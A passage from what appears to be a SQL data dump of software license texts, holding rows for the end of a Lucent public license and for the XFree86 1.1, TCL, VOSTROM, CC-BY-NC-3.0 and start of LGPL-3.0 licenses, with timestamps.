commercial product offering, such\nDistributor (\"Commercial Distributor\") hereby agrees to defend and indemnify\nevery Contributor (\"Indemnified Contributor\") against any losses, damages\nand costs (collectively \"Losses\") arising from claims, lawsuits and other\nlegal actions brought by a third party against the Indemnified Contributor\nto the extent caused by the acts or omissions of such Commercial Distributor\nin connection with its distribution of the Program in a commercial product\noffering. The obligations in this section do not apply to any claims or Losses\nrelating to any actual or alleged intellectual property infringement. In order\nto qualify, an Indemnified Contributor must: a) promptly notify the Commercial\nDistributor in writing of such claim, and b) allow the Commercial Distributor\nto control, and cooperate with the Commercial Distributor in, the defense\nand any related settlement negotiations. The Indemnified Contributor may participate\nin any such claim at its own expense.\n\nFor example, a Distributor might include the Program in a commercial product\noffering, Product X. That Distributor is then a Commercial Distributor. If\nthat Commercial Distributor then makes performance claims, or offers warranties\nrelated to Product X, those performance claims and warranties are such Commercial\nDistributor\'s responsibility alone. Under this section, the Commercial Distributor\nwould have to defend claims against the Contributors related to those performance\nclaims and warranties, and if a court requires any Contributor to pay any\ndamages as a result, the Commercial Distributor must pay those damages.\n\n 5. NO WARRANTY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON\nAN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS\nOR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF\nTITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\nEach Recipient is solely responsible for determining the appropriateness of\nusing and distributing the Program and assumes all risks associated with its\nexercise of rights under this Agreement, including but not limited to the\nrisks and costs of program errors, compliance with applicable laws, damage\nto or loss of data, programs or equipment, and unavailability or interruption\nof operations.\n\n 6. DISCLAIMER OF LIABILITY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY\nCONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION\nLOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS\nGRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. EXPORT CONTROL\n\nRecipient agrees that Recipient alone is responsible for compliance with the\nUnited States export administration regulations (and the export control laws\nand regulation of any other countries).\n\n 8. GENERAL\n\nIf any provision of this Agreement is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this Agreement, and without further action by the parties hereto,\nsuch provision shall be reformed to the minimum extent necessary to make such\nprovision valid and enforceable.\n\nIf Recipient institutes patent litigation against a Contributor with respect\nto a patent applicable to software (including a cross-claim or counterclaim\nin a lawsuit), then any patent licenses granted by that Contributor to such\nRecipient under this Agreement shall terminate as of the date such litigation\nis filed. In addition, if Recipient institutes patent litigation against any\nentity (including a cross-claim or counterclaim in a lawsuit) alleging that\nthe Program itself (excluding combinations of the Program with other software\nor hardware) infringes such Recipient\'s patent(s), then such Recipient\'s rights\ngranted under Section 2(b) shall terminate as of the date such litigation\nis filed.\n\nAll Recipient\'s rights under this Agreement shall terminate if it fails to\ncomply with any of the material terms or conditions of this Agreement and\ndoes not cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If all Recipient\'s rights under this Agreement terminate,\nRecipient agrees to cease use and distribution of the Program as soon as reasonably\npracticable. However, Recipient\'s obligations under this Agreement and any\nlicenses granted by Recipient relating to the Program shall continue and survive.\n\nLUCENT may publish new versions (including revisions) of this Agreement from\ntime to time. Each new version of the Agreement will be given a distinguishing\nversion number. The Program (including Contributions) may always be distributed\nsubject to the version of the Agreement under which it was received. In addition,\nafter a new version of the Agreement is published, Contributor may elect to\ndistribute the Program (including its Contributions) under the new version.\nNo one other than LUCENT has the right to modify this Agreement. Except as\nexpressly stated in Sections 2(a) and 2(b) above, Recipient receives no rights\nor licenses to the intellectual property of any Contributor under this Agreement,\nwhether expressly, by implication, estoppel or otherwise. All rights in the\nProgram not expressly granted under this Agreement are reserved.\n\nThis Agreement is governed by the laws of the State of New York and the intellectual\nproperty laws of the United States of America. No party to this Agreement\nwill bring a legal action under this Agreement more than one year after the\ncause of action arose. Each party waives its rights to a jury trial in any\nresulting litigation.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(341,'XFree86-1.1','XFree86 License (version 1.1)\n\nCopyright (C) 1994-2006 The XFree86 Project, Inc.\n\nAll rights reserved.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions, and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution, and in the same place\nand form as other copyright, license and disclaimer information.\n\n3. The end-user documentation included with the redistribution, if any, must\ninclude the following acknowledgment: \"This product includes software developed\nby The XFree86 Project, Inc (http://www.xfree86.org/) and its contributors\",\nin the same place and form as other third-party acknowledgments. Alternately,\nthis acknowledgment may appear in the software itself, in the same form and\nlocation as other such third-party acknowledgments.\n\n4. Except as contained in this notice, the name of The XFree86 Project, Inc\nshall not be used in advertising or otherwise to promote the sale, use or\nother dealings in this Software without prior written authorization from The\nXFree86 Project, Inc.\n\nTHIS SOFTWARE IS PROVIDED ``AS IS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES,\nINCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE XFREE86\nPROJECT, INC OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(342,'TCL','This software is copyrighted by the Regents of the University of California,\nSun Microsystems, Inc., Scriptics Corporation, ActiveState Corporation and\nother parties. The following terms apply to all files associated with the\nsoftware unless explicitly disclaimed in individual files.\n\nThe authors hereby grant permission to use, copy, modify, distribute, and\nlicense this software and its documentation for any purpose, provided that\nexisting copyright notices are retained in all copies and that this notice\nis included verbatim in any distributions. No written agreement, license,\nor royalty fee is required for any of the authorized uses. Modifications to\nthis software may be copyrighted by their authors and need not follow the\nlicensing terms described here, provided that the new terms are clearly indicated\non the first page of each file where they apply.\n\nIN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY FOR DIRECT,\nINDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE\nUSE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY DERIVATIVES THEREOF, EVEN\nIF THE AUTHORS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nTHE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR\nA PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE IS PROVIDED ON AN\n\"AS IS\" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO PROVIDE\nMAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.\n\nGOVERNMENT USE: If you are acquiring this software on behalf of the U.S. government,\nthe Government shall have only \"Restricted Rights\" in the software and related\ndocumentation as defined in the Federal Acquisition Regulations (FARs) in\nClause 52.227.19 (c) (2). If you are acquiring the software on behalf of the\nDepartment of Defense, the software shall be classified as \"Commercial Computer\nSoftware\" and the Government shall have only \"Restricted Rights\" as defined\nin Clause 252.227-7013 (c) (1) of DFARs. Notwithstanding the foregoing, the\nauthors grant the U.S. Government and others acting in its behalf permission\nto use and distribute the software in accordance with the terms specified\nin this license.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(343,'VOSTROM','VOSTROM Public License for Open Source\n\nCopyright (c) 2007 VOSTROM Holdings, Inc.\n\nThis VOSTROM Holdings, Inc. (VOSTROM) Distribution (code and documentation)\nis made available to the open source community as a public service by VOSTROM.\nContact VOSTROM at license@vostrom.com for information on other licensing\narrangements (e.g. for use in proprietary applications).\n\nUnder this license, this Distribution may be modified and the original version\nand modified versions may be copied, distributed, publicly displayed and performed\nprovided that the following conditions are met:\n\n1. Modified versions are distributed with source code and documentation and\nwith permission for others to use any code and documentation (whether in original\nor modified versions) as granted under this license;\n\n2. if modified, the source code, documentation, and user run-time elements\nshould be clearly labeled by placing an identifier of origin (such as a name,\ninitial, or other tag) after the version number;\n\n3. users, modifiers, distributors, and others coming into possession or using\nthe Distribution in original or modified form accept the entire risk as to\nthe possession, use, and performance of the Distribution;\n\n4. this copyright management information (software identifier and version\nnumber, copyright notice and license) shall be retained in all versions of\nthe Distribution;\n\n5. VOSTROM may make modifications to the Distribution that are substantially\nsimilar to modified versions of the Distribution, and may make, use, sell,\ncopy, distribute, publicly display, and perform such modifications, including\nmaking such modifications available under this or other licenses, without\nobligation or restriction;\n\n6. modifications incorporating code, libraries, and/or documentation subject\nto any other open source license may be made, and the resulting work may be\ndistributed under the terms of such open source license if required by that\nopen source license, but doing so will not affect this Distribution, other\nmodifications made under this license or modifications made under other VOSTROM\nlicensing arrangements;\n\n7. no permission is granted to distribute, publicly display, or publicly perform\nmodifications to the Distribution made using proprietary materials that cannot\nbe released in source format under conditions of this license;\n\n8. the name of VOSTROM may not be used in advertising or publicity pertaining\nto Distribution of the software without specific, prior written permission.\n\nThis software is made available \"as is\", and\n\nVOSTROM DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, WITH REGARD TO THIS\nSOFTWARE, INCLUDING WITHOUT LIMITATION ALL IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE, AND IN NO EVENT SHALL VOSTROM BE LIABLE\nFOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER\nRESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,\nTORT (INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING OUT OF OR IN CONNECTION\nWITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(344,'CC-BY-NC-3.0','Creative Commons Attribution-NonCommercial 3.0 Unported CREATIVE COMMONS CORPORATION\nIS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS\nLICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED\nTO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION\nOF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Adaptation\" means a work based upon the Work, or upon the Work and other\npre-existing works, such as a translation, adaptation, derivative work, arrangement\nof music or other alterations of a literary or artistic work, or phonogram\nor performance and includes cinematographic adaptations or any other form\nin which the Work may be recast, transformed, or adapted including in any\nform recognizably derived from the original, except that a work that constitutes\na Collection will not be considered an Adaptation for the purpose of this\nLicense. For the avoidance of doubt, where the Work is a musical work, performance\nor phonogram, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered an Adaptation for the purpose of this\nLicense.\n\nb. \"Collection\" means a collection of literary or artistic works, such as\nencyclopedias and anthologies, or performances, phonograms or broadcasts,\nor other works or subject matter other than works listed in Section 1(f) below,\nwhich, by reason of the selection and arrangement of their contents, constitute\nintellectual creations, in which the Work is included in its entirety in unmodified\nform along with one or more other contributions, each constituting separate\nand independent works in themselves, which together are assembled into a collective\nwhole. A work that constitutes a Collection will not be considered an Adaptation\n(as defined above) for the purposes of this License.\n\nc. \"Distribute\" means to make available to the public the original and copies\nof the Work or Adaptation, as appropriate, through sale or other transfer\nof ownership.\n\nd. \"Licensor\" means the individual, individuals, entity or entities that offer(s)\nthe Work under the terms of this License.\n\ne. \"Original Author\" means, in the case of a literary or artistic work, the\nindividual, individuals, entity or entities who created the Work or if no\nindividual or entity can be identified, the publisher; and in addition (i)\nin the case of a performance the actors, singers, musicians, dancers, and\nother persons who act, sing, deliver, declaim, play in, interpret or otherwise\nperform literary or artistic works or expressions of folklore; (ii) in the\ncase of a phonogram the producer being the person or legal entity who first\nfixes the sounds of a performance or other sounds; and, (iii) in the case\nof broadcasts, the organization that transmits the broadcast.\n\nf. \"Work\" means the literary and/or artistic work offered under the terms\nof this License including without limitation any production in the literary,\nscientific and artistic domain, whatever may be the mode or form of its expression\nincluding digital form, such as a book, pamphlet and other writing; a lecture,\naddress, sermon or other work of the same nature; a dramatic or dramatico-musical\nwork; a choreographic work or entertainment in dumb show; a musical composition\nwith or without words; a cinematographic work to which are assimilated works\nexpressed by a process analogous to cinematography; a work of drawing, painting,\narchitecture, sculpture, engraving or lithography; a photographic work to\nwhich are assimilated works expressed by a process analogous to photography;\na work of applied art; an illustration, map, plan, sketch or three-dimensional\nwork relative to geography, topography, architecture or science; a performance;\na broadcast; a phonogram; a compilation of data to the extent it is protected\nas a copyrightable work; or a work performed by a variety or circus performer\nto the extent it is not otherwise considered a literary or artistic work.\n\ng. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\nh. \"Publicly Perform\" means to perform public recitations of the Work and\nto communicate to the public those public recitations, by any means or process,\nincluding by wire or wireless means or public digital performances; to make\navailable to the public Works in such a way that members of the public may\naccess these Works from a place and at a place individually chosen by them;\nto perform the Work to the public by any means or process and the communication\nto the public of the performances of the Work, including by public digital\nperformance; to broadcast and rebroadcast the Work by any means including\nsigns, sounds or images.\n\ni. \"Reproduce\" means to make copies of the Work by any means including without\nlimitation by sound or visual recordings and the right of fixation and reproducing\nfixations of the Work, including storage of a protected performance or phonogram\nin digital form or other electronic medium.\n\n2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit,\nor restrict any uses free from copyright or rights arising from limitations\nor exceptions that are provided for in connection with the copyright protection\nunder copyright law or other applicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to Reproduce the Work, to incorporate the Work into one or more Collections,\nand to Reproduce the Work as incorporated in the Collections;\n\nb. to create and Reproduce Adaptations provided that any such Adaptation,\nincluding any translation in any medium, takes reasonable steps to clearly\nlabel, demarcate or otherwise identify that changes were made to the original\nWork. For example, a translation could be marked \"The original work was translated\nfrom English to Spanish,\" or a modification could indicate \"The original work\nhas been modified.\";\n\nc. to Distribute and Publicly Perform the Work including as incorporated in\nCollections; and,\n\n d. to Distribute and Publicly Perform Adaptations.\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nSubject to Section 8(f), all rights not expressly granted by Licensor are\nhereby reserved, including but not limited to the rights set forth in Section\n4(d).\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may Distribute or Publicly Perform the Work only under the terms of\nthis License. You must include a copy of, or the Uniform Resource Identifier\n(URI) for, this License with every copy of the Work You Distribute or Publicly\nPerform. You may not offer or impose any terms on the Work that restrict the\nterms of this License or the ability of the recipient of the Work to exercise\nthe rights granted to that recipient under the terms of the License. You may\nnot sublicense the Work. You must keep intact all notices that refer to this\nLicense and to the disclaimer of warranties with every copy of the Work You\nDistribute or Publicly Perform. When You Distribute or Publicly Perform the\nWork, You may not impose any effective technological measures on the Work\nthat restrict the ability of a recipient of the Work from You to exercise\nthe rights granted to that recipient under the terms of the License. This\nSection 4(a) applies to the Work as incorporated in a Collection, but this\ndoes not require the Collection apart from the Work itself to be made subject\nto the terms of this License. If You create a Collection, upon notice from\nany Licensor You must, to the extent practicable, remove from the Collection\nany credit as required by Section 4(c), as requested. If You create an Adaptation,\nupon notice from any Licensor You must, to the extent practicable, remove\nfrom the Adaptation any credit as required by Section 4(c), as requested.\n\nb. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nc. If You Distribute, or Publicly Perform the Work or any Adaptations or Collections,\nYou must, unless a request has been made pursuant to Section 4(a), keep intact\nall copyright notices for the Work and provide, reasonable to the medium or\nmeans You are utilizing: (i) the name of the Original Author (or pseudonym,\nif applicable) if supplied, and/or if the Original Author and/or Licensor\ndesignate another party or parties (e.g., a sponsor institute, publishing\nentity, journal) for attribution (\"Attribution Parties\") in Licensor\'s copyright\nnotice, terms of service or by other reasonable means, the name of such party\nor parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably\npracticable, the URI, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and, (iv) consistent with Section 3(b), in the case\nof an Adaptation, a credit identifying the use of the Work in the Adaptation\n(e.g., \"French translation of the Work by Original Author,\" or \"Screenplay\nbased on original Work by Original Author\"). The credit required by this Section\n4(c) may be implemented in any reasonable manner; provided, however, that\nin the case of a Adaptation or Collection, at a minimum such credit will appear,\nif a credit for all contributing authors of the Adaptation or Collection appears,\nthen as part of these credits and in a manner at least as prominent as the\ncredits for the other contributing authors. For the avoidance of doubt, You\nmay only use the credit required by this Section for the purpose of attribution\nin the manner set out above and, by exercising Your rights under this License,\nYou may not implicitly or explicitly assert or imply any connection with,\nsponsorship or endorsement by the Original Author, Licensor and/or Attribution\nParties, as appropriate, of You or Your use of the Work, without the separate,\nexpress prior written permission of the Original Author, Licensor and/or Attribution\nParties.\n\n d. For the avoidance of doubt:\n\ni. Non-waivable Compulsory License Schemes. In those jurisdictions in which\nthe right to collect royalties through any statutory or compulsory licensing\nscheme cannot be waived, the Licensor reserves the exclusive right to collect\nsuch royalties for any exercise by You of the rights granted under this License;\n\nii. Waivable Compulsory License Schemes. In those jurisdictions in which the\nright to collect royalties through any statutory or compulsory licensing scheme\ncan be waived, the Licensor reserves the exclusive right to collect such royalties\nfor any exercise by You of the rights granted under this License if Your exercise\nof such rights is for a purpose or use which is otherwise than noncommercial\nas permitted under Section 4(b) and otherwise waives the right to collect\nroyalties through any statutory or compulsory licensing scheme; and,\n\niii. Voluntary License Schemes. The Licensor reserves the right to collect\nroyalties, whether individually or, in the event that the Licensor is a member\nof a collecting society that administers voluntary licensing schemes, via\nthat society, from any exercise by You of the rights granted under this License\nthat is for a purpose or use which is otherwise than noncommercial as permitted\nunder Section 4(c).\n\ne. Except as otherwise agreed in writing by the Licensor or as may be otherwise\npermitted by applicable law, if You Reproduce, Distribute or Publicly Perform\nthe Work either by itself or as part of any Adaptations or Collections, You\nmust not distort, mutilate, modify or take other derogatory action in relation\nto the Work which would be prejudicial to the Original Author\'s honor or reputation.\nLicensor agrees that in those jurisdictions (e.g. Japan), in which any exercise\nof the right granted in Section 3(b) of this License (the right to make Adaptations)\nwould be deemed to be a distortion, mutilation, modification or other derogatory\naction prejudicial to the Original Author\'s honor and reputation, the Licensor\nwill waive or not assert, as appropriate, this Section, to the fullest extent\npermitted by the applicable national law, to enable You to reasonably exercise\nYour right under Section 3(b) of this License (right to make Adaptations)\nbut not otherwise.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Adaptations or Collections from You under this License,\nhowever, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You Distribute or Publicly Perform the Work or a Collection,\nthe Licensor offers to the recipient a license to the Work on the same terms\nand conditions as the license granted to You under this License.\n\nb. Each time You Distribute or Publicly Perform an Adaptation, Licensor offers\nto the recipient a license to the original Work on the same terms and conditions\nas the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nf. The rights granted under, and the subject matter referenced, in this License\nwere drafted utilizing the terminology of the Berne Convention for the Protection\nof Literary and Artistic Works (as amended on September 28, 1979), the Rome\nConvention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances\nand Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised\non July 24, 1971). These rights and subject matter take effect in the relevant\njurisdiction in which the License terms are sought to be enforced according\nto the corresponding provisions of the implementation of those treaty provisions\nin the applicable national law. If the standard suite of rights granted under\napplicable copyright law includes additional rights not granted under this\nLicense, such additional rights are deemed to be included in the License;\nthis License is not intended to restrict the license of any rights under applicable\nlaw.\n\nCreative Commons Notice\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, Creative Commons does not authorize the use by either\nparty of the trademark \"Creative Commons\" or any related trademark or logo\nof Creative Commons without the prior written consent of Creative Commons.\nAny permitted use will be in compliance with Creative Commons\' then-current\ntrademark usage guidelines, as may be published on its website or otherwise\nmade available upon request from time to time. For the avoidance of doubt,\nthis trademark restriction does not form part of the License.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(345,'LGPL-3.0-or-later','GNU LESSER GENERAL PUBLIC LICENSE\n\nVersion 3, 29 June 2007\n\nCopyright (C) 2007 Free Software Foundation, Inc. <http s ://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nThis version of the GNU Lesser General Public License incorporates the terms\nand conditions of version 3 of the GNU General Public License, supplemented\nby the additional permissions listed below.\n\n 0. Additional Definitions.\n\n \n\nAs used herein, \"this License\" refers to version 3 of the GNU Lesser General\nPublic License, and the \"GNU GPL\" refers to version 3 of the GNU General Public\nLicense.\n\n \n\n\"The Library\" refers to a covered work governed by this License, other than\nan Application or a Combined Work as defined below.\n\n \n\nAn \"Application\" is any work that makes use of an interface provided by the\nLibrary, but which is not otherwise based on the Library. Defining a subclass\nof a class defined by the Library is deemed a mode of using an interface provided\nby the Library.\n\n \n\nA \"Combined Work\" is a work produced by combining or linking an Application\nwith the Library. The particular version of the Library with which the Combined\nWork was made is also called the \"Linked Version\".\n\n \n\nThe \"Minimal Corresponding Source\" for a Combined Work means the Corresponding\nSource for the Combined Work, excluding any source code for portions of the\nCombined Work that, considered in isolation, are based on the Application,\nand not on the Linked Version.\n\n \n\nThe \"Corresponding Application Code\" for a Combined Work means the object\ncode and/or source code for the Application, including any data and utility\nprograms needed for reproducing the Combined Work from the Application, but\nexcluding the System Libraries of the Combined Work.\n\n 1. Exception to Section 3 of the GNU GPL.\n\nYou may convey a covered work under sections 3 and 4 of this License without\nbeing bound by section 3 of the GNU GPL.\n\n 2. Conveying Modified Versions.\n\nIf you modify a copy of the Library, and, in your modifications, a facility\nrefers to a function or data to be supplied by an Application that uses the\nfacility (other than as an argument passed when the facility is invoked),\nthen you may convey a copy of the modified version:\n\na) under this License, provided that you make a good faith effort to ensure\nthat, in the event an Application does not supply the function or data, the\nfacility still operates, and performs whatever part of its purpose remains\nmeaningful, or\n\nb) under the GNU GPL, with none of the additional permissions of this License\napplicable to that copy.\n\n 3. Object Code Incorporating Material from Library Header Files.\n\nThe object code form of an Application may incorporate material from a header\nfile that is part of the Library. You may convey such object code under terms\nof your choice, provided that, if the incorporated material is not limited\nto numerical parameters, data structure layouts and accessors, or small macros,\ninline functions and templates (ten or fewer lines in length), you do both\nof the following:\n\na) Give prominent notice with each copy of the object code that the Library\nis used in it and that the Library and its use are covered by this License.\n\nb) Accompany the object code with a copy of the GNU GPL and this license document.\n\n 4. Combined Works.\n\nYou may convey a Combined Work under terms of your choice that, taken together,\neffectively do not restrict modification of the portions of the Library contained\nin the Combined Work and reverse engineering for debugging such modifications,\nif you also do each of the following:\n\na) Give prominent notice with each copy of the Combined Work that the Library\nis used in it and that the Library and its use are covered by this License.\n\nb) Accompany the Combined Work with a copy of the GNU GPL and this license\ndocument.\n\nc) For a Combined Work that displays copyright notices during execution, include\nthe copyright notice for the Library among these notices, as well as a reference\ndirecting the user to the copies of the GNU GPL and this license document.\n\n d) Do one of the following:\n\n0) Convey the Minimal Corresponding Source under the terms of this License,\nand the Corresponding Application Code in a form suitable for, and under terms\nthat permit, the user to recombine or relink the Application with a modified\nversion of the Linked Version to produce a modified Combined Work, in the\nmanner specified by section 6 of the GNU GPL for conveying Corresponding Source.\n\n1) Use a suitable shared library mechanism for linking with the Library. A\nsuitable mechanism is one that (a) uses at run time a copy of the Library\nalready present on the user\'s computer system, and (b) will operate properly\nwith a modified version of the Library that is interface-compatible with the\nLinked Version.\n\ne) Provide Installation Information, but only if you would otherwise be required\nto provide such information under section 6 of the GNU GPL, and only to the\nextent that such information is necessary to install and execute a modified\nversion of the Combined Work produced by recombining or relinking the Application\nwith a modified version of the Linked Version. (If 